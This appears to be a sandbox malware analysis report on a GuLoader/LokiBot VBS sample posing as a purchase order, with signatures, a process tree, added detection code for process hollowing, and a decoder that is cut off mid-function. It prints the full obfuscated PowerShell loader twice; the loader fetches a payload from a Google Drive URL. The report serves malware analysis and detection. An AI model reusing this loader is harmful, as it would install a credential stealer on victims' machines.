Malware Analysis Report

2025-05-28 17:39

Sample ID 240311-rwallshb97
Target PO 05-03-2024 AKTINA-CDS.vbs
SHA256 9e544c53dffc7c410220f17bc3a9f96f83f98a2bcdaa882183408d5194bf6a9e
Tags
guloader lokibot collection downloader spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9e544c53dffc7c410220f17bc3a9f96f83f98a2bcdaa882183408d5194bf6a9e

Threat Level: Known bad

The file PO 05-03-2024 AKTINA-CDS.vbs was found to be: Known bad.

Malicious Activity Summary

guloader lokibot collection downloader spyware stealer trojan

Guloader,Cloudeye

Lokibot

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

outlook_win_path

outlook_office_path

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-11 14:32

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-11 14:32

Reported

2024-03-11 14:34

Platform

win7-20231129-en

Max time kernel

119s

Max time network

127s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO 05-03-2024 AKTINA-CDS.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WScript.exe | N/A
N/A | N/A | C:\Windows\System32\WScript.exe | N/A
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1136 set thread context of 2796 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1920 wrote to memory of 1212 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1920 wrote to memory of 1212 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1920 wrote to memory of 1212 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1212 wrote to memory of 2872 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 2872 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 2872 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 1136 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1212 wrote to memory of 1136 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1212 wrote to memory of 1136 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1212 wrote to memory of 1136 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1136 wrote to memory of 1804 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1136 wrote to memory of 1804 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1136 wrote to memory of 1804 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1136 wrote to memory of 1804 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1136 wrote to memory of 2796 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1136 wrote to memory of 2796 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1136 wrote to memory of 2796 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1136 wrote to memory of 2796 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1136 wrote to memory of 2796 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1136 wrote to memory of 2796 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
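Read together, the WriteProcessMemory rows (cross-process writes that here line up with each process start) and the single SetThreadContext row give the whole chain of this detonation: WScript.exe (1920) starts the 64-bit powershell.exe (1212); that starts cmd.exe (2872) for the `set /A` trick and a 32-bit powershell.exe (1136) under SysWOW64; 1136 starts its own cmd.exe (1804), then wab.exe (2796), writes into it and redirects its thread context. Writing a payload into a freshly started signed Windows binary and then pointing its thread at that payload is process hollowing, and the Outlook profile reads attributed to wab.exe above are consistent with the LokiBot stealer running inside it rather than the real Windows Contacts binary. The snippet below is an added example for this report, not code from the sandbox or the sample: it rebuilds that tree from the rows above (repeated rows collapsed) and flags the write-then-SetThreadContext pair. Treating the first WriteProcessMemory into a PID as its creation edge is an assumption, since the report has no parent-PID column.

```python
"""Rebuild the behavioral1 process chain from WriteProcessMemory / SetThreadContext
rows and flag the hollowing pattern. Added example; EVENTS is transcribed from the
report's tables (duplicate rows collapsed), not captured live."""
import ntpath

WSCRIPT = r"C:\Windows\System32\WScript.exe"
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"
CMD64 = r"C:\Windows\system32\cmd.exe"
CMD32 = r"C:\Windows\SysWOW64\cmd.exe"
WAB = r"C:\Program Files (x86)\windows mail\wab.exe"

# (api, actor_pid, actor_image, target_pid, target_image), from the report
EVENTS = [
    ("WriteProcessMemory", 1920, WSCRIPT, 1212, PS64),
    ("WriteProcessMemory", 1212, PS64, 2872, CMD64),
    ("WriteProcessMemory", 1212, PS64, 1136, PS32),
    ("WriteProcessMemory", 1136, PS32, 1804, CMD32),
    ("WriteProcessMemory", 1136, PS32, 2796, WAB),
    ("SetThreadContext", 1136, PS32, 2796, WAB),
]


def _name(image: str) -> str:
    """Lower-cased basename so System32 and SysWOW64 copies compare equal."""
    return ntpath.basename(image).lower()


def parent_map(events):
    """target pid -> actor pid, taken from the first WriteProcessMemory into it.
    Assumption: the first writer into a new pid is its creator (the report has
    no parent-pid column). Also returns pid -> image path for every pid seen."""
    parents, images = {}, {}
    for api, apid, aimg, tpid, timg in events:
        images.setdefault(apid, aimg)
        images.setdefault(tpid, timg)
        if api == "WriteProcessMemory" and tpid != apid and tpid not in parents:
            parents[tpid] = apid
    return parents, images


def lineage(pid, events):
    """Image basenames from the root of the chain down to pid, cycle-safe."""
    parents, images = parent_map(events)
    chain = [pid]
    while chain[-1] in parents and parents[chain[-1]] not in chain:
        chain.append(parents[chain[-1]])
    return [_name(images[p]) for p in reversed(chain)]


def find_hollowing(events):
    """(actor, target) pairs where one actor both wrote into the target's memory
    and changed its thread context: the write-then-redirect core of hollowing."""
    writers = {(a, t) for api, a, _, t, _ in events if api == "WriteProcessMemory"}
    redirects = {(a, t) for api, a, _, t, _ in events if api == "SetThreadContext"}
    return sorted(writers & redirects)


def hollowing_report(events):
    """Each flagged pair with the full lineage of the hollowed process."""
    return [(a, t, lineage(t, events)) for a, t in find_hollowing(events)]


if __name__ == "__main__":
    for actor, target, names in hollowing_report(EVENTS):
        print(f"{actor} hollowed {target}: {' -> '.join(names)}")
```

The two-set intersection in `find_hollowing` is the whole of the signal; it ports directly to any telemetry that records cross-process writes and thread-context changes with actor and target PIDs, and the lineage check on top of it (script host, then PowerShell, then a Windows binary that has no business being started that way) is what separates this from a debugger or an installer touching a child it owns.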

outlook_office_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A

outlook_win_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO 05-03-2024 AKTINA-CDS.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Baissers Gennemlevet Skovmaare bordlampernes overdepending Tinged Solvation #>;$Tartane=(cmd /c set /A 115^^0);Function Greaseless ([String]$Dampsprre){$Tartane=[char][int]$Tartane;$Singlesculleren=$Tartane+'ubstring';$Saamaskinenndgaar=8;$Artifact=Rigsrevisorloven4($Dampsprre);For($Saamaskinen=7; $Saamaskinen -lt $Artifact; $Saamaskinen+=$Saamaskinenndgaar){$Apeks10=$Dampsprre.$Singlesculleren.Invoke($Saamaskinen, 1);$Rigsrevisorloven=$Rigsrevisorloven+$Apeks10;}$Rigsrevisorloven;}function Signficantly ($Gring){& ($Rigsrevisorloven01) ($Gring);}function Rigsrevisorloven4 ([String]$Argumentspecifikationer){$Forstrke1=$Argumentspecifikationer.Length-1;$Forstrke1;}$Rigsrevisorloven02=Greaseless 'ForskreTfins.rir,armeovameletinnF.restislaseretf Frimnde C mmisrBa tegnrUndg,deimokkasinExpurgagGotikse ';$berigningernes=Greaseless 'haan.vghIndurant Vr,raat Au,incp GidselsOx loac:Teskere/Snorket/ An,aegdFjortenrC.mpingiEnforesvtoxaemieSerm.ni.MuscavagCorantoo troweloAuktiong i terwlZimmerweOverdom. 
KsnehacHy.rocao Bron.hmdisabus/Ubenvntu SkudtecFor,igt?LiftingeRecon ixclinchepCigaretoBa,udlnrNeij.sst Ign,pu= StikledRaveineo Infa cw.omitecnFimsenelAssertooKretidsaDialytidVirks m&SetterniOligosydMyelopa=Grammat1BoligenVBakkendCG.rmantd overvaQAfs ndi1 D.crepJConringa PostpaB Vinter2NavneorGL.mperacTrypt scprighooj UnsolduGe,brugCMarkmaniMislighOOldefdrgErotomaeHobbier4Begi,en6Nobesge1Sama,beuClang.nX .eningQFunktioQWandlikDSurprecfRhi.inaadagligp9 zoopsy- T.iennMHnsehus ';$Rigsrevisorloven01=Greaseless 'ManglediRinninge buliabxunderv ';$Rigsrevisorloven00=Greaseless 'Sej ruk$DelnoeggKedlenslBontebuoLfterbebMacrongaParticulUllings:nonco,gFSubc.ntoUdtydedrVaarbebs VekseltP estigrKvitt rkCir,opheHaiku t8Mis kst Leg,ml=Splodge SteelhSSpexenet C,lpitaRurlgeurUnwishetN nelec-LauraldB Ta ineiIngardstNcarspjsDenotabTLi enyrrBaptisia Fnblgnnste.svisPredictfOmstbnieAntistarSoegete Weake,s-NebulisSAktieliomurksvauInnovatrDommed c UglereeRipston Afmatni$Di gorgb S.kkerepeekab,rMilj raiMisr,lagFlisesenRetroveiS.goejnnSpectacgBeskedee,nvoicirParchisnMes.erieVizslassPrdikat Tuefor-EcstatiDNuancineSe,ologsSoilagetElektroi.onfilinSpyendeaReoperatComakesiSpir tuoOperatin Massse Pi.kups$ AcademFC onicroTramcarrSmands.s ,ortiet TerefarSkndetfk Udf.lieMiskych2Interb ';Signficantly (Greaseless 'Co.tain$.agnomsg An,ulllBagmakeoSvejsefbMedmenna Taalsoleksiler:odontolFUdmaltioRo.ekonrUnhea,esRdmedestKrediterL,ftsrukKjrulffeLagrang2 Nailed=Besl.gs$ balanceWeaklinnTod menvE.sanci:OuttradaRoaredgp AllonypRepo,tedCnidosiaRchitectJordaneaSimulta ') ;Signficantly (Greaseless 'Steg paI leskabmFormyndp nfanteoAandsslr NovemptLaven m-Slid,etM ,andfroAntagondGlan,esuHoutp rlAbund.neSin,fot ArbejdsB ma icbiTryksvatT.rbenssRedeploTAfbankirForn.ftaKorporlnPont.acsuafgjorf upbuoyeSquitterCompreh ') ;$Forstrke2=$Forstrke2+'\Sprgerens.Cav' ;Signficantly (Greaseless 'Condole$FinnmargFormumnl ,ectonoKrybeipbPlankevaCystostl gyptol:AbjectiFInvendioS,dafrirTumefyisSaucematSamtykkr .olysekHalvbueeunderto7 
Indpla=Adjoint(CrapaudT NajendeCorrectsHe stnitDekater-PewskenPDcorbeaa Hol.bat ypnothT.olley Reneta$ bullpuFVergerloBradawlr DataposPreco.ftMillasnrdomsto.kMisalt,eSpinope2 krome.) Spiree ') ;while (-not $Forstrke7) {Signficantly (Greaseless 'Fals fiI.lagetof Sta tt Deaconr(Vand va$ Smit.eFTapereroIndustrrFactitisEtrusketOutrivar.lektrok FedthaeDaggrye8markhor.FrifindJMnst.rgoR geligbTvangs.SSubk,tatNeutralaPrestidt AffirmeLrkenpa Appoint-afparereL itancqmandsch Stersky$ByggeleR VakuumiKonjakggScisselsKaprerer DivorceThundervRykkerbiS lfsaisBnli.esoNostalgr,lamodil ForeneoSpadserv Tax,cleHrdneafn Forskr0Kassevo2 Un,len)unfondn Coccoli{Sul rinSVi,tualtBe,ixttaS,gnetrrTruge.st D sire-Sul.anaSSkiftetlIreosoveLich ake LbepompNocerit Virksom1 Paaske}Sheart,eWillfulls.necurs slugteenarcoti{Krom toS Univert sk.vsaamispricrDevisertFission- T milsSLitt ralPaydayseE.spreseBenzinspbestikk Wayment1App.oks;Omprio S,elanchiIntershgAfstikknMagasr.fS,imulaiMetalwocPhytopta Stabe nOve.skatTrbe kyl Affyrey Topbet Spoofed$IndskrnR remindiHornbeagCascromsDuplikerSagestke PoliorvDiscan,inabolagsPrevailobagpiperKonias lFor.udsoKonsulevsham,oceDjvleudn.echeck0Potable0 F,jlre}Portabi ');Signficantly (Greaseless 'Apokope$GadeuorgSulfidelAdminisoStallmabAminoaca Thane,lFormnin:Lobu.itF HjemadoSubstanrGenrefosStorktrtLeveaarrTehuseskPro meneOrdrese7Choledo=Palaeon(FlagdugTPlayfele Vagtlesmotortrt enmoto-millocrP AmmermabygningtMesenteh Aan.sa Trichob$S.isekaF Kva.taoBekendtrPsoralesPhe,ometW,edlinrCharro,kIlluviaehaugesk2Hormone)Opsugni ') ;}Signficantly (Greaseless 'Tegular$VrimlengEng andl.idevenoB naughbK ightaaAfskumnl Quinti: hallotA PolyppvNveombuaAfmattenautopyoiOberstlaUnderst bi che=Bekrfte IdelrerGUnders eTransshtjockey.-G,atbruC ateteroTe egranDetailptAlarmu,e quaes nUnpretet Kodese Coadjut$SongletFHockeykoBow yparMaccabasNeedypetNe.opanr Morakkk kiftereUnhinde2 .ndlin ');Signficantly (Greaseless 'Heterom$ Phyt,ggHeadendlW.shasto spidombBygg saa Ind omlHeksame: 
Sa,ctiKexcernboNytaarsgOkkupateVirksoms BygakspMatchmarHenaandiDengsertSpkkecotUnbedfae Sorts nAmiasresMercena Skihopp=Accroac Suppler[ BelizeSSpr ngdy,roszyssPolyphot muldreKlevarem erdeop.ModpartCRameousoAffichenUomgn ev profuneModningrProgr.mt Siksak]Corfit :Bisfrak: HarehoFTrffe.irB ligydoHomacanmGulasmaBFjerndia lfactisTerceleeAgkistr6Worce.t4DopingsSLispountBirianirSul,houiSparusmnGeodt.agFalskne( Shortc$ PeriskADisobedvExpensiaFodfolknBu.lcomiSolomonaLi.iere)sekundr ');Signficantly (Greaseless 'Forplig$congealgScenefulUnblindoTvangsfbbermudaa Spade,l ,vangl:Folkl,rR CachuaiProlifegOverrassFibromerMrkningeUnder rvFrigreliVividvisProletaoFr sager Sl etrl Sj.tteoStavbaavBeinlyaeBayonnenDvelrer2Tautego Returko=.nlaure Vildsku[Unde,kuStegneseyOrganogsKinostetOutgaineKvaseh.m U.beau.LectureTclacklie,amnonixAgnyomstUnresem. PellitEAntioxinBa,talecB,llatao patterdDefineriUltrafinanthracgS.miorg]Fase um:Berl ne:Demole ASa dierSLatyrusCUnree,eI KinesiIstyrtdy.vildmndG PinchpeFyldetstAfknapsS KertertErgoterrEyeglasi psychrnLio.neagscirocc(Tensio.$Par.plyKPrepareoMo.elfogForn teeTopdelesSu.fonapUndergrrTankeeki FanebltRaillert Flerkoeisotenin SchismsFluorid)Cdgchau ');Signficantly (Greaseless 'Unmedic$compagngAn.ennelMatematoApoteksbFri.hteaUdp,ntelsuccour:TopbetjR Slgendi unexplg,ervekrsSekraftrPtilotae glennsvEntomoliSamanfesCystosyo durganruforesplFungiteo Radforv,verstaeDroschenTerras.3.amenen=Stegefe$,edsaltRImbeciliPr,gramg.tikdaas OmbrinrStrongyeRati,navBrnd,mriChastitsAsymmetog,andoar TuberclSubmucoocrackmavVkstbeteMilieubnC.illin2Hftetsb.Tr,holds,steriau Ru,egobBugspytsTramlintLitt,rtrDesillui SergelnMillen,gFravnni( Nyopre3 E fing2Frances2 Str so4 Po.ari7Equipoi2 Anpart,mismeas3Carragh1Syn.opa2Lugedes6Gos ipi1S.spect) Afsk,b ');Signficantly $Rigsrevisorloven3;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Baissers Gennemlevet Skovmaare bordlampernes overdepending Tinged Solvation #>;$Tartane=(cmd /c set /A 115^^0);Function Greaseless ([String]$Dampsprre){$Tartane=[char][int]$Tartane;$Singlesculleren=$Tartane+'ubstring';$Saamaskinenndgaar=8;$Artifact=Rigsrevisorloven4($Dampsprre);For($Saamaskinen=7; $Saamaskinen -lt $Artifact; $Saamaskinen+=$Saamaskinenndgaar){$Apeks10=$Dampsprre.$Singlesculleren.Invoke($Saamaskinen, 1);$Rigsrevisorloven=$Rigsrevisorloven+$Apeks10;}$Rigsrevisorloven;}function Signficantly ($Gring){& ($Rigsrevisorloven01) ($Gring);}function Rigsrevisorloven4 ([String]$Argumentspecifikationer){$Forstrke1=$Argumentspecifikationer.Length-1;$Forstrke1;}$Rigsrevisorloven02=Greaseless 'ForskreTfins.rir,armeovameletinnF.restislaseretf Frimnde C mmisrBa tegnrUndg,deimokkasinExpurgagGotikse ';$berigningernes=Greaseless 'haan.vghIndurant Vr,raat Au,incp GidselsOx loac:Teskere/Snorket/ An,aegdFjortenrC.mpingiEnforesvtoxaemieSerm.ni.MuscavagCorantoo troweloAuktiong i terwlZimmerweOverdom. 
KsnehacHy.rocao Bron.hmdisabus/Ubenvntu SkudtecFor,igt?LiftingeRecon ixclinchepCigaretoBa,udlnrNeij.sst Ign,pu= StikledRaveineo Infa cw.omitecnFimsenelAssertooKretidsaDialytidVirks m&SetterniOligosydMyelopa=Grammat1BoligenVBakkendCG.rmantd overvaQAfs ndi1 D.crepJConringa PostpaB Vinter2NavneorGL.mperacTrypt scprighooj UnsolduGe,brugCMarkmaniMislighOOldefdrgErotomaeHobbier4Begi,en6Nobesge1Sama,beuClang.nX .eningQFunktioQWandlikDSurprecfRhi.inaadagligp9 zoopsy- T.iennMHnsehus ';$Rigsrevisorloven01=Greaseless 'ManglediRinninge buliabxunderv ';$Rigsrevisorloven00=Greaseless 'Sej ruk$DelnoeggKedlenslBontebuoLfterbebMacrongaParticulUllings:nonco,gFSubc.ntoUdtydedrVaarbebs VekseltP estigrKvitt rkCir,opheHaiku t8Mis kst Leg,ml=Splodge SteelhSSpexenet C,lpitaRurlgeurUnwishetN nelec-LauraldB Ta ineiIngardstNcarspjsDenotabTLi enyrrBaptisia Fnblgnnste.svisPredictfOmstbnieAntistarSoegete Weake,s-NebulisSAktieliomurksvauInnovatrDommed c UglereeRipston Afmatni$Di gorgb S.kkerepeekab,rMilj raiMisr,lagFlisesenRetroveiS.goejnnSpectacgBeskedee,nvoicirParchisnMes.erieVizslassPrdikat Tuefor-EcstatiDNuancineSe,ologsSoilagetElektroi.onfilinSpyendeaReoperatComakesiSpir tuoOperatin Massse Pi.kups$ AcademFC onicroTramcarrSmands.s ,ortiet TerefarSkndetfk Udf.lieMiskych2Interb ';Signficantly (Greaseless 'Co.tain$.agnomsg An,ulllBagmakeoSvejsefbMedmenna Taalsoleksiler:odontolFUdmaltioRo.ekonrUnhea,esRdmedestKrediterL,ftsrukKjrulffeLagrang2 Nailed=Besl.gs$ balanceWeaklinnTod menvE.sanci:OuttradaRoaredgp AllonypRepo,tedCnidosiaRchitectJordaneaSimulta ') ;Signficantly (Greaseless 'Steg paI leskabmFormyndp nfanteoAandsslr NovemptLaven m-Slid,etM ,andfroAntagondGlan,esuHoutp rlAbund.neSin,fot ArbejdsB ma icbiTryksvatT.rbenssRedeploTAfbankirForn.ftaKorporlnPont.acsuafgjorf upbuoyeSquitterCompreh ') ;$Forstrke2=$Forstrke2+'\Sprgerens.Cav' ;Signficantly (Greaseless 'Condole$FinnmargFormumnl ,ectonoKrybeipbPlankevaCystostl gyptol:AbjectiFInvendioS,dafrirTumefyisSaucematSamtykkr .olysekHalvbueeunderto7 
Indpla=Adjoint(CrapaudT NajendeCorrectsHe stnitDekater-PewskenPDcorbeaa Hol.bat ypnothT.olley Reneta$ bullpuFVergerloBradawlr DataposPreco.ftMillasnrdomsto.kMisalt,eSpinope2 krome.) Spiree ') ;while (-not $Forstrke7) {Signficantly (Greaseless 'Fals fiI.lagetof Sta tt Deaconr(Vand va$ Smit.eFTapereroIndustrrFactitisEtrusketOutrivar.lektrok FedthaeDaggrye8markhor.FrifindJMnst.rgoR geligbTvangs.SSubk,tatNeutralaPrestidt AffirmeLrkenpa Appoint-afparereL itancqmandsch Stersky$ByggeleR VakuumiKonjakggScisselsKaprerer DivorceThundervRykkerbiS lfsaisBnli.esoNostalgr,lamodil ForeneoSpadserv Tax,cleHrdneafn Forskr0Kassevo2 Un,len)unfondn Coccoli{Sul rinSVi,tualtBe,ixttaS,gnetrrTruge.st D sire-Sul.anaSSkiftetlIreosoveLich ake LbepompNocerit Virksom1 Paaske}Sheart,eWillfulls.necurs slugteenarcoti{Krom toS Univert sk.vsaamispricrDevisertFission- T milsSLitt ralPaydayseE.spreseBenzinspbestikk Wayment1App.oks;Omprio S,elanchiIntershgAfstikknMagasr.fS,imulaiMetalwocPhytopta Stabe nOve.skatTrbe kyl Affyrey Topbet Spoofed$IndskrnR remindiHornbeagCascromsDuplikerSagestke PoliorvDiscan,inabolagsPrevailobagpiperKonias lFor.udsoKonsulevsham,oceDjvleudn.echeck0Potable0 F,jlre}Portabi ');Signficantly (Greaseless 'Apokope$GadeuorgSulfidelAdminisoStallmabAminoaca Thane,lFormnin:Lobu.itF HjemadoSubstanrGenrefosStorktrtLeveaarrTehuseskPro meneOrdrese7Choledo=Palaeon(FlagdugTPlayfele Vagtlesmotortrt enmoto-millocrP AmmermabygningtMesenteh Aan.sa Trichob$S.isekaF Kva.taoBekendtrPsoralesPhe,ometW,edlinrCharro,kIlluviaehaugesk2Hormone)Opsugni ') ;}Signficantly (Greaseless 'Tegular$VrimlengEng andl.idevenoB naughbK ightaaAfskumnl Quinti: hallotA PolyppvNveombuaAfmattenautopyoiOberstlaUnderst bi che=Bekrfte IdelrerGUnders eTransshtjockey.-G,atbruC ateteroTe egranDetailptAlarmu,e quaes nUnpretet Kodese Coadjut$SongletFHockeykoBow yparMaccabasNeedypetNe.opanr Morakkk kiftereUnhinde2 .ndlin ');Signficantly (Greaseless 'Heterom$ Phyt,ggHeadendlW.shasto spidombBygg saa Ind omlHeksame: 
Sa,ctiKexcernboNytaarsgOkkupateVirksoms BygakspMatchmarHenaandiDengsertSpkkecotUnbedfae Sorts nAmiasresMercena Skihopp=Accroac Suppler[ BelizeSSpr ngdy,roszyssPolyphot muldreKlevarem erdeop.ModpartCRameousoAffichenUomgn ev profuneModningrProgr.mt Siksak]Corfit :Bisfrak: HarehoFTrffe.irB ligydoHomacanmGulasmaBFjerndia lfactisTerceleeAgkistr6Worce.t4DopingsSLispountBirianirSul,houiSparusmnGeodt.agFalskne( Shortc$ PeriskADisobedvExpensiaFodfolknBu.lcomiSolomonaLi.iere)sekundr ');Signficantly (Greaseless 'Forplig$congealgScenefulUnblindoTvangsfbbermudaa Spade,l ,vangl:Folkl,rR CachuaiProlifegOverrassFibromerMrkningeUnder rvFrigreliVividvisProletaoFr sager Sl etrl Sj.tteoStavbaavBeinlyaeBayonnenDvelrer2Tautego Returko=.nlaure Vildsku[Unde,kuStegneseyOrganogsKinostetOutgaineKvaseh.m U.beau.LectureTclacklie,amnonixAgnyomstUnresem. PellitEAntioxinBa,talecB,llatao patterdDefineriUltrafinanthracgS.miorg]Fase um:Berl ne:Demole ASa dierSLatyrusCUnree,eI KinesiIstyrtdy.vildmndG PinchpeFyldetstAfknapsS KertertErgoterrEyeglasi psychrnLio.neagscirocc(Tensio.$Par.plyKPrepareoMo.elfogForn teeTopdelesSu.fonapUndergrrTankeeki FanebltRaillert Flerkoeisotenin SchismsFluorid)Cdgchau ');Signficantly (Greaseless 'Unmedic$compagngAn.ennelMatematoApoteksbFri.hteaUdp,ntelsuccour:TopbetjR Slgendi unexplg,ervekrsSekraftrPtilotae glennsvEntomoliSamanfesCystosyo durganruforesplFungiteo Radforv,verstaeDroschenTerras.3.amenen=Stegefe$,edsaltRImbeciliPr,gramg.tikdaas OmbrinrStrongyeRati,navBrnd,mriChastitsAsymmetog,andoar TuberclSubmucoocrackmavVkstbeteMilieubnC.illin2Hftetsb.Tr,holds,steriau Ru,egobBugspytsTramlintLitt,rtrDesillui SergelnMillen,gFravnni( Nyopre3 E fing2Frances2 Str so4 Po.ari7Equipoi2 Anpart,mismeas3Carragh1Syn.opa2Lugedes6Gos ipi1S.spect) Afsk,b ');Signficantly $Rigsrevisorloven3;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"
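The powershell.exe command line above is the GuLoader first stage, and every string handed to Greaseless is filler with one payload character at every eighth position: the loop starts at index 7, steps by 8 and stops while the index is below Length-1, so the trailing filler chunk contributes nothing. The method name is hidden too: `cmd /c set /A 115^^0` (the cmd.exe child listed above) evaluates 115 XOR 0 = 115, which is the character 's', and 's' + 'ubstring' becomes the `.substring` call, keeping that word out of the script text. The Python decoder below is an added example, not part of the report or of the sample; the three literals it carries are copied from the command line. Two caveats apply to literals taken from this page rather than from the captured script: the report wraps the long command line at spaces (the line break inside the URL literal is treated here as the single space the original carries, an assumption), and the HTML rendering appears to have collapsed runs of spaces inside some literals (the one assigned to $Rigsrevisorloven00, for instance), which shifts the 8-character frame and drops characters from the output. For complete recovery run the decoder over the script as captured.

```python
"""Decoder for the string obfuscation in this report's GuLoader PowerShell stage.
Added example written for this report, not code from the sample or the sandbox.
The literals below are copied from the powershell.exe command line."""
import re

# $Saamaskinen=7 and $Saamaskinenndgaar=8 in the captured script
OFFSET = 7
STEP = 8


def resolve_method_name(expr_value: int = 115 ^ 0) -> str:
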